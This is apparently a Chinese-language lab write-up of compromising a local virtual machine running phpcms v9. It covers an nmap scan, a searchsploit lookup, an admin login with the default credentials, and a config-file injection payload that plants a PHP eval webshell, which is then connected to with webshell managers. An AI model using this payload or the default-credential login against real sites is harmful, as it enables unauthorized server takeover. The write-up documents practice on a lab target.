搞死虚拟机-80端口

端口扫描:nmap -sV -v -A 192.168.206.129

搞死虚拟机-80端口_第1张图片

根据扫描信息推断是phpcms  后台是admin.php  大版本是 v9

搞死虚拟机-80端口_第2张图片

使用kali的searchsploit搜索phpcms存在的漏洞

搞死虚拟机-80端口_第3张图片

尝试利用这个9.0版本存在的SQL盲注

搞死虚拟机-80端口_第4张图片

但是经过测试,不存在该sql注入漏洞

利用robots.txt文件获取到的后台信息,访问后台

然后尝试phpcms的默认口令phpcms phpcms 成功登陆后台

搞死虚拟机-80端口_第5张图片

网上资料查找,后台存在一处配置文件getshell

搞死虚拟机-80端口_第6张图片

会把key的值直接写到\phpcms\caches\configs\system.php配置文件,配置文件getshell最关键的就是闭合了,直接写入一句话木马会变成key的一个值,因此需要使用逗号、注释符及其他符号进行闭合,经过多次测试,如下是可以直接写入的payload:

\',@eval($_POST[123]),//

搞死虚拟机-80端口_第7张图片

 提交之后进行访问,可以解析

搞死虚拟机-80端口_第8张图片

 使用菜刀连接,连接失败  使用蚁剑也连接失败,这是怎么回事,该网站的PHP版本也不是太高,怎么回事???

原来是我的工具太老了 被我电脑的安全软件删掉了一些关键的东西 所以使用不了了,向朋友要了个c刀,顺利连接上

搞死虚拟机-80端口_第9张图片

 

 

 

你可能感兴趣的:(漏洞)